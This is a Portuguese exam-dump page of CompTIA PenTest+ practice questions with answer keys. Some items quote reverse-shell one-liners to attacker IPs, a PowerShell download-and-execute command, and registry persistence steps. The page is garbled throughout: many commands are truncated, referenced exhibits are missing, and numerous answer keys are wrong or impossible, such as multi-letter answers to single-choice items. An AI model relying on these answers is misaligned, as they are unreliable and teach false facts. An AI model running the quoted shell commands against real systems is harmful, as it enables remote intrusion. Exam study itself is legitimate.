NÃO QUER PERDER NADA?

Dicas para passar no exame de certificação

Últimas notícias sobre exames e informações sobre descontos

Curadoria e atualizada por nossos especialistas

Sim, me envie o boletim informativo

Perguntas e respostas do exame de certificação CompTIA PT0-001, Certificação CompTIA PenTest+ | SPOTO

Prepare-se para o exame de certificação CompTIA PenTest+ (PT0-001) com nossos recursos abrangentes. Nossos testes práticos, com as perguntas mais recentes do exame, são projetados para ajudá-lo a se destacar em sua jornada de preparação. A certificação PT0-001 é única em seu foco na habilidade prática, testando candidatos em diversos ambientes, incluindo a nuvem e plataformas móveis, juntamente com desktops e servidores tradicionais. Praticando com as nossas perguntas de exame, exemplos de perguntas e dumps de exame, obterá uma compreensão profunda do conteúdo do exame e estará bem preparado para enfrentar os desafios. Os nossos exames simulados e o simulador de exame melhoram ainda mais a sua preparação, garantindo que está equipado para ter sucesso no dia do exame. Aproveite nossos materiais de exame e respostas de exame para aumentar sua confiança e alcançar seus objetivos de certificação CompTIA PenTest+.
Faça outros exames online

Pergunta #1
Um testador de penetração executa os seguintes comandos: Qual das seguintes opções é uma vulnerabilidade de host local que o invasor está explorando?
A. Permissões de ficheiro inseguras
B. Lista branca de aplicações
C. Fuga de conchas
D. Serviço gravável
Ver resposta
Resposta correta: D
Pergunta #2
Um técnico de testes de penetração está a redigir um relatório que descreve o nível geral de risco para as operações. Em qual das seguintes áreas do relatório é que o técnico de testes de penetração deve colocar essa informação?
A. Apêndices
B. Resumo executivo
C. Resumo técnico
D. Corpo principal
Ver resposta
Resposta correta: B
Pergunta #3
Dado o seguinte script Python: Qual das seguintes opções é o destino da saída?
A. Para o ecrã
B. Para um servidor de rede
C. Para um ficheiro
D. Para /dev/null
Ver resposta
Resposta correta: A
Pergunta #4
Um técnico de testes de penetração está a analisar os seguintes resultados de um sniffer sem fios: Qual das seguintes opções pode ser extrapolada a partir das informações acima?
A. Fornecedor de hardware
B. Interferência de canal
C. Nomes de utilizador
D. Ponto forte
Ver resposta
Resposta correta: ACG
Pergunta #5
Um testador de penetração pretende lançar uma janela de consola gráfica a partir de um anfitrião remotamente comprometido com o IP 10.0.0.20 e apresentar o terminal no computador local com o IP 192.168.1.10. Qual das seguintes opções realizaria essa tarefa?
A. A partir do computador remoto, execute os seguintes comandos: export XHOST 192
B. A partir do computador local, execute o seguinte comando: ssh -L4444:127
C. A partir do computador remoto, execute o seguinte comando: ssh -R6000:127
D. No computador local, execute o seguinte comando: nc -l -p 6000 Em seguida, no computador remoto, execute o seguinte comando: xterm | nc 192
Ver resposta
Resposta correta: D
Pergunta #6
Um consultor de segurança recebe um documento que descreve o âmbito de um teste de penetração futuro. Esse documento contém endereços IP e horários em que cada um pode ser verificado. Qual dos seguintes itens conteria essas informações?
A. Regras de empenhamento
B. Pedido de proposta
C. Acordo-quadro de serviços
D. Análise do impacto nas empresas
Ver resposta
Resposta correta: A
Pergunta #7
Um cliente solicitou um teste de penetração de rede externa para fins de conformidade. Durante a discussão entre o cliente e o testador de penetração, o cliente expressa sua relutância em adicionar os endereços IP de origem do testador de penetração à lista de permissões do IPS do cliente durante o teste. Qual dos seguintes é o MELHOR argumento para que os endereços IP de origem do testador de penetração sejam incluídos na lista de permissões?
A. A colocação em lista branca impede um possível ataque DoS inadvertido contra o IPS e os sistemas de monitorização de registos de suporte
B. Os testes de penetração de sistemas IPS de terceiros requerem frequentemente documentação e autorizações adicionais, o que pode atrasar o teste sensível ao fator tempo
C. As regras de whitelisting do IPS requerem actualizações frequentes para se manterem actualizadas, devido ao constante desenvolvimento de vulnerabilidades e pontos fracos recentemente descobertos
D. Os testes devem centrar-se na descoberta de possíveis problemas de segurança em todos os sistemas abrangidos e não na determinação da eficácia relativa das defesas activas, como um IPS
Ver resposta
Resposta correta: A
Pergunta #8
A utilização de uma "ferramenta debaixo da porta" durante uma avaliação da segurança física é um exemplo de qual dos seguintes tipos de técnicas de intrusão?
A. Arrombamento de fechaduras
B. Acionamento do sensor de saída
C. Choque de bloqueio
D. Desvio do bloqueio
Ver resposta
Resposta correta: A
Pergunta #9
Um técnico de testes de penetração está a efetuar falsificação de ARP contra um comutador. Qual das seguintes opções deve ser falsificada para obter o máximo de informações?
A. Endereço MAC do cliente
B. Endereço MAC do controlador de domínio
C. Endereço MAC do servidor Web
D. Endereço MAC do gateway
Ver resposta
Resposta correta: A
Pergunta #10
Qual dos seguintes comandos inicia a base de dados do Metasploit?
A. msfconsole
B. espaço de trabalho
C. msfvenom
D. db_init
E. db_connect
Ver resposta
Resposta correta: AB
Pergunta #11
Qual das seguintes ferramentas é utilizada para efetuar um ataque de força bruta às credenciais?
A. Hidra
B. John, o Estripador
C. Hashcat
D. Pêssego
Ver resposta
Resposta correta: D
Pergunta #12
Uma organização de cuidados de saúde tem de cumprir os regulamentos locais para proteger e atestar a proteção de informações de saúde pessoais de indivíduos abrangidos. Qual das seguintes condições deve ser especificamente testada por um técnico de testes de penetração ao efetuar uma avaliação? (Seleccione DUAS).
A. Exposição de texto não criptografado de dados de intercepções SNMP
B. Bugs de software residentes no sistema informático de emissão de bilhetes
C. Modelos de certificados S/MIME definidos pela CA
D. Informações de saúde comunicadas por HTTP
E. Encriptação DAR nos servidores de registos
Ver resposta
Resposta correta: A
Pergunta #13
Durante a avaliação de uma aplicação Web, um técnico de testes de penetração descobre que podem ser executados comandos arbitrários no servidor. Querendo levar esse ataque um passo adiante, o testador de penetração começa a explorar maneiras de obter um shell reverso de volta para a máquina atacante em 192.168.1.5. Quais das seguintes são formas possíveis de o fazer? (Seleccione DUAS).
A. nc 192
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
D. nc -e /bin/sh 192
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
Ver resposta
Resposta correta: A
Pergunta #14
Ao tentar manter a persistência num sistema Windows com privilégios limitados, qual das seguintes chaves de registo deve ser utilizada pelo verificador?
A. HKEY_CLASSES_ROOT
B. HKEY_LOCAL_MACHINE
C. HKEY_UTILIZADOR_ACTUAL
D. HKEY_CURRENT_CONFIG
Ver resposta
Resposta correta: D
Pergunta #15
Um testador de penetração efectuou uma avaliação de segurança para uma empresa em fase de arranque. O relatório lista um total de dez vulnerabilidades, com cinco identificadas como críticas. O cliente não tem os recursos necessários para corrigir imediatamente todas as vulnerabilidades. Nessas circunstâncias, qual das seguintes opções seria a MELHOR sugestão para o cliente?
A. Aplicar controlos de compensação fáceis para vulnerabilidades críticas para minimizar o risco e, em seguida, redefinir a prioridade da correção
B. Identifique os problemas que podem ser resolvidos mais rapidamente e trate-os primeiro
C. Implementar primeiro as medidas de correção das vulnerabilidades críticas com menor impacto e, em seguida, abordar outras vulnerabilidades críticas
D. Corrigir primeiro a vulnerabilidade mais crítica, mesmo que isso signifique que a correção das outras vulnerabilidades possa demorar muito tempo
Ver resposta
Resposta correta: B
Pergunta #16
Um técnico de testes de penetração pretende visar o serviço de nomes NETBIOS. Qual dos seguintes é o comando MAIS provável para explorar o serviço de nomes NETBIOS?
A. arpspoof
B. nmap
C. responder
D. burpsuite
Ver resposta
Resposta correta: A
Pergunta #17
Um testador de penetração relata que uma aplicação só está a utilizar a autenticação básica numa aplicação virada para a Internet. Qual das seguintes opções seria a MELHOR estratégia de correção?
A. Ativar a segurança de transporte estrito HTTP
B. Ativar um sinalizador de cookie seguro
C. Encriptar o canal de comunicação
D. Sanitize a entrada inválida do utilizador
Ver resposta
Resposta correta: C
Pergunta #18
Depois de obter acesso inicial de baixo privilégio a um sistema Linux, um testador de penetração identifica um binário interessante na pasta pessoal de um utilizador intitulado "changepass" -sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass Usando "strings" para imprimir caracteres imprimíveis em ASCII do changepass, o testador observa o seguinte: $ strings changepass exit setuid strcmp GLIBC_2.0 ENV_PATH %s/changepw malloc strlen Dada esta informação, qual dos seguintes é o caminho de exploração MAIS provável para alcançar o root p
A. Copie o changepass para um diretório que possa ser escrito e exporte a variável ambiental ENV_PATH para o caminho de um binário de roubo de tokens intitulado changepw
B. Criar uma cópia do changepass no mesmo diretório, atribuindo-lhe o nome changepw
C. Exporte a variável ambiental ENV_PATH para o caminho de um diretório gravável que contém um binário de roubo de token intitulado changepw
D. Executar changepass dentro do diretório atual com sudo depois de exportar a variável ambiental ENV_PATH para o caminho de '/usr/local/bin'
Ver resposta
Resposta correta: A
Pergunta #19
Qual das seguintes propriedades do acordo de compromisso de teste de penetração terá o MAIOR impacto na observação e teste dos sistemas de produção nas suas cargas mais elevadas?
A. Criação de um âmbito dos sistemas de produção críticos
B. Estabelecer um calendário de horários de acesso aos testes
C. Estabelecer um compromisso de teste de caixa branca
D. Ter a direção a assinar os testes intrusivos
Ver resposta
Resposta correta: C
Pergunta #20
Em qual dos seguintes cenários um testador efectuaria um ataque Kerberoasting?
A. O testador comprometeu um dispositivo Windows e descarrega os segredos LSA
B. O testador precisa de recuperar a base de dados SAM e decifrar os hashes das palavras-passe
C. O testador comprometeu um utilizador com privilégios limitados e precisa de visar outras contas para movimento lateral
D. O testador comprometeu uma conta e precisa de descarregar hashes e palavras-passe em texto simples do sistema
Ver resposta
Resposta correta: B
Pergunta #21
Durante os testes, é descoberta uma vulnerabilidade crítica no servidor principal de um cliente. Qual das seguintes acções deve ser a PRÓXIMA?
A. Desativar a porta de rede do serviço afetado
B. Completar todas as conclusões e apresentá-las ao cliente
C. Alertar prontamente o cliente com pormenores sobre a descoberta
D. Colocar o alvo offline para que não possa ser explorado por um atacante
Ver resposta
Resposta correta: D
Pergunta #22
Um avaliador de segurança está a tentar criar ficheiros XML especializados para testar a segurança das funções de análise durante a ingestão numa aplicação Windows. Antes de começar a testar a aplicação, qual das seguintes opções o avaliador deve solicitar à organização?
A. Exemplos de mensagens SOAP
B. A documentação da API REST
C. Um utilitário de fuzzing de protocolos
D. Um ficheiro XSD aplicável
Ver resposta
Resposta correta: A
Pergunta #23
Qual dos seguintes excertos seria proveniente de uma política empresarial?
A. As palavras-passe dos empregados devem conter um mínimo de oito caracteres, sendo um deles alfanumérico
B. O serviço de assistência pode ser contactado através do número 800-passwd1 para efetuar a reposição da palavra-passe
C. Os funcionários devem utilizar palavras-passe fortes para aceder aos activos da empresa
D. Os sistemas empresariais têm de armazenar palavras-passe utilizando o algoritmo de hashing MD5
Ver resposta
Resposta correta: B
Pergunta #24
A seguinte linha foi encontrada no ficheiro de histórico de uma máquina explorada. Um atacante executou o seguinte comando: bash -i >& /dev/tcp/192.168.0.1/80 0> &1 Qual das seguintes opções descreve o que o comando faz?
A. Executa uma varredura de porta
B. Pega o banner do servidor web
C. Redirecciona um TTY para um sistema remoto
D. Remove os registos de erros para o IP fornecido
Ver resposta
Resposta correta: AC
Pergunta #25
Um investigador de penetração conseguiu obter as credenciais iniciais do domínio do utilizador VPN através de phishing de um membro do departamento de TI. Posteriormente, o técnico de testes de penetração obteve hashes através da VPN e decifrou-os facilmente utilizando um ataque de dicionário. Qual das seguintes etapas de correção deve ser recomendada? (Seleccione TRÊS).
A. Exigir que todos os empregados recebam formação de sensibilização para a segurança
B. Implementar a autenticação de dois factores para o acesso remoto
C. Instalar um sistema de prevenção de intrusões
D. Aumentar os requisitos de complexidade das palavras-passe
E. Instalar uma solução de monitorização de eventos de informação de segurança
F. Impedir que os membros do departamento de TI iniciem sessão de forma interactiva como administradores
G. Atualizar o conjunto de cifras utilizado para a solução VPN
Ver resposta
Resposta correta: A
Pergunta #26
Um técnico de testes de penetração implantou com êxito um gémeo mau e está a começar a ver algum tráfego de vítimas. O próximo passo que o testador de penetração quer dar é capturar todo o tráfego da Web da vítima sem criptografia. Qual das seguintes opções seria a MELHOR para atingir este objetivo?
A. Efetuar um ataque de downgrade HTTP
B. Recolher as credenciais do utilizador para desencriptar o tráfego
C. Efetuar um ataque MITM
D. Implementar um ataque de CA fazendo-se passar por CAs de confiança
Ver resposta
Resposta correta: A
Pergunta #27
Considere o seguinte comando do PowerShell: powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1");Invoke-Cmdlet Qual das seguintes opções descreve MELHOR as acções executadas por este comando?
A. Definir a política de execução
B. Executar um script remoto
C. Executar um comando codificado
D. Instanciar um objeto
Ver resposta
Resposta correta: C
Pergunta #28
Uma empresa de energia contratou uma empresa de segurança para realizar um teste de penetração numa central eléctrica, que utiliza ICS para gerir a produção de energia e a refrigeração. Qual das seguintes é uma consideração exclusiva de tal ambiente que deve ser feita pela empresa ao se preparar para a avaliação?
A. Seleção do conjunto adequado de ferramentas de teste de segurança
B. Corrente e capacidade de carga dos componentes do ICS
C. Potenciais riscos operacionais e de segurança
D. Certificação eléctrica do equipamento utilizado no ensaio
Ver resposta
Resposta correta: DE
Pergunta #29
Um testador de penetração observa que várias portas com números elevados estão à escuta num servidor Web público. No entanto, o proprietário do sistema diz que o aplicativo usa apenas a porta 443. Qual das seguintes opções seria a MELHOR para recomendar?
A. Transição da aplicação para outra porta
B. Filtrar a porta 443 para endereços IP específicos
C. Implementar uma firewall de aplicação Web
D. Desativar serviços desnecessários
Ver resposta
Resposta correta: D
Pergunta #30
Um testador de penetração está realizando uma varredura remota para determinar se o farm de servidores está em conformidade com a linha de base de software da empresa. Qual das seguintes opções o testador de penetração deve executar para verificar a conformidade com a linha de base?
A. Exame da descoberta
B. Verificação furtiva
C. Verificação completa
D. Verificação credenciada
Ver resposta
Resposta correta: B
Pergunta #31
Um técnico de testes de penetração está a testar uma aplicação bancária e descobre uma vulnerabilidade. O testador está ligado como um utilizador não privilegiado que não deve ter acesso a quaisquer dados. Tendo em conta os dados abaixo, provenientes do proxy de interceção da Web: Qual dos seguintes tipos de vulnerabilidades está a ser explorado?
A. Vulnerabilidade de navegação forçada
B. Parâmetro de vulnerabilidade à poluição
C. Vulnerabilidade de carregamento de ficheiros
D. Enumeração de cookies
Ver resposta
Resposta correta: A
Pergunta #32
Durante uma avaliação de segurança de âmbito total, qual das seguintes opções é um pré-requisito para efetuar engenharia social num alvo, envolvendo-o fisicamente?
A. Localização das saídas de emergência
B. Preparação de um pretexto
C. Dar de ombros à vítima
D. Seguir a vítima
Ver resposta
Resposta correta: A
Pergunta #33
Um analista de segurança recebeu um relatório de penetração detalhado, que foi realizado no ambiente DMZ da organização. Foi anotado no relatório que uma descoberta tem uma pontuação de base CVSS de 10,0. Qual dos seguintes níveis de dificuldade seria necessário para explorar essa vulnerabilidade?
A. Muito difícil; os sistemas de perímetro estão normalmente atrás de uma firewall
B. Um pouco difícil; exigiria um poder de processamento significativo para ser explorado
C. Trivial; é necessário pouco esforço para explorar esta descoberta
D. Impossível; os anfitriões externos são reforçados para proteção contra ataques
Ver resposta
Resposta correta: C
Pergunta #34
Um utilizador malicioso pretende efetuar um ataque MITM a um computador. A configuração da rede do computador é apresentada de seguida: IP: 192.168.1.20 NETMASK: 255.255.255.0 DEFAULT GATEWAY: 192.168.1.254 DHCP: 192.168.1.253 DNS: 192.168.10.10, 192.168.20.10 Qual dos seguintes comandos deve o utilizador malicioso executar para efetuar o ataque MITM?
A. arpspoof -c both -r -t 192
B. arpspoof -t 192
C. arpspoof -c both -t 192
D. arpspoof -r -t 192
Ver resposta
Resposta correta: D
Pergunta #35
Um investigador de penetração obteve acesso ao dispositivo de um funcionário do departamento de marketing. O verificador de penetração pretende garantir que, se o acesso for descoberto, o controlo do dispositivo pode ser recuperado. Qual das seguintes acções deve o verificador de penetração utilizar para manter a persistência no dispositivo? (Seleccione DUAS.)
A. Coloque uma entrada em HKLM\Software\Microsoft\CurrentVersion\Run para chamar au57d
B. Coloque uma entrada em C:\windows\system32\drivers\etc\hosts para 12
C. Coloque um script em C:\users\%username\local\appdata\roaming\temp\au57d
D. Criar um serviço falso no Windows chamado RTAudio para executar manualmente
E. Coloque uma entrada para o RTAudio em HKLM\CurrentControlSet\Services\RTAudio
F. Crie uma tarefa de agenda para chamar C:\windows\system32\drivers\etc\hosts
Ver resposta
Resposta correta: AC
Pergunta #36
Um técnico de testes de penetração conseguiu introduzir um comando de injeção SQL numa caixa de texto e obter acesso às informações armazenadas na base de dados. Qual das seguintes é a MELHOR recomendação para mitigar a vulnerabilidade?
A. Randomize as credenciais utilizadas para iniciar sessão
B. Instalar a deteção de intrusão baseada no anfitrião
C. Implementar a normalização da entrada
D. Efetuar o endurecimento do sistema
Ver resposta
Resposta correta: AE
Pergunta #37
Qual das seguintes ferramentas é utilizada por um técnico de testes de penetração para realizar OSINT? (Seleccione DUAS).
A. Shodan
B. CONJUNTO
C. BeEF
D. Wireshark
E. Maltego
F. Dínamo
Ver resposta
Resposta correta: CD
Pergunta #38
Qual das seguintes é a razão pela qual um testador de penetração executaria o comandochkconfig --del servicename no final de um compromisso?
A. Para remover a persistência
B. Para ativar a persistência
C. Para registar a persistência
D. Para verificar a persistência
Ver resposta
Resposta correta: A
Pergunta #39
Qual das seguintes situações levaria um técnico de testes de penetração a comunicar com o proprietário/cliente de um sistema durante um teste? (Seleccione DUAS.)
A. O testador descobre dados pessoais identificáveis no sistema
B. O sistema mostra evidências de comprometimento não autorizado anterior
C. O sistema apresenta uma falta de endurecimento em toda a sua extensão
D. O sistema fica indisponível após uma tentativa de exploração
E. O testador descobre uma descoberta num sistema fora do âmbito
Ver resposta
Resposta correta: A
Pergunta #40
Um testador de penetração quer criar um script para descobrir todos os registos RPTR para um intervalo de endereços IP. Qual das seguintes opções é a MAIS eficiente a ser utilizada?
A. nmap -p 53 -oG dnslist
B. nslookup -ns 8
C. for x in {1
D. dig -r > echo "8
Ver resposta
Resposta correta: D
Pergunta #41
Um testador de penetração observa que o cabeçalho da política de segurança de conteúdo está em falta durante um teste de penetração de uma aplicação Web. Qual das técnicas a seguir o testador de penetração MAIS provavelmente executaria?
A. Ataque de injeção de comandos
B. Ataque de clickjacking
C. Ataque de travessia de directórios
D. Ataque remoto de inclusão de ficheiros
Ver resposta
Resposta correta: D
Pergunta #42
Um técnico de testes de penetração analisa os resultados do exame de uma aplicação Web. Qual das seguintes vulnerabilidades é a MAIS crítica e deve ser priorizada para exploração?
A. XSS armazenado
B. Divulgação do percurso de enchimento
C. Certificado caducado
D. Clickjacking
Ver resposta
Resposta correta: D
Pergunta #43
Um testador de penetração compromete um sistema que tem acesso irrestrito à rede pela porta 443 para qualquer host. O testador de penetração quer criar um shell reverso da vítima de volta para o atacante. Qual dos seguintes métodos o testador de penetração usaria com maior probabilidade?
A. perl -e 'use SOCKET'; $i='; $p='443;
B. ssh superadmin@-p 443
C. nc -e /bin/sh443
D. bash -i >& /dev/tcp//443 0>&1
Ver resposta
Resposta correta: D
Pergunta #44
Qual das seguintes é a razão pela qual um testador de penetração executaria o comando chkconfig --del servicename no final de um compromisso?
A. Para remover a persistência
B. Para ativar a persistência
C. Para registar a persistência
D. Para verificar a persistência
Ver resposta
Resposta correta: A
Pergunta #45
Qual das seguintes opções descreve MELHOR alguns pontos fracos significativos da segurança de um ICS, como os utilizados em instalações de serviços eléctricos, instalações de gás natural, barragens e instalações nucleares?
A. Os fornecedores de ICS são lentos a implementar controlos de segurança adequados
B. O pessoal do ICS não tem formação adequada para desempenhar as suas funções básicas
C. Existe uma escassez de equipamento de substituição para dispositivos críticos
D. Existe uma falta de conformidade para as instalações ICS
Ver resposta
Resposta correta: B
Pergunta #46
Os dispositivos IoT baseados no consumidor são frequentemente menos seguros do que os sistemas criados para computadores de secretária tradicionais. Qual das seguintes opções descreve MELHOR o raciocínio para este facto?
A. Os fabricantes que desenvolvem dispositivos IoT estão menos preocupados com a segurança
B. É difícil para os administradores implementar as mesmas normas de segurança em todos os sectores
C. Os sistemas IoT carecem frequentemente da potência de hardware exigida por soluções mais seguras
D. As autoridades reguladoras têm frequentemente requisitos de segurança mais baixos para os sistemas IoT
Ver resposta
Resposta correta: A

Ver as respostas após o envio

Por favor, envie seu e-mail e WhatsApp para obter respostas às perguntas.

Observação: certifique-se de que seu ID de e-mail e Whatsapp sejam válidos para que você possa obter os resultados corretos do exame.

E-mail:
WhatsApp/número de telefone: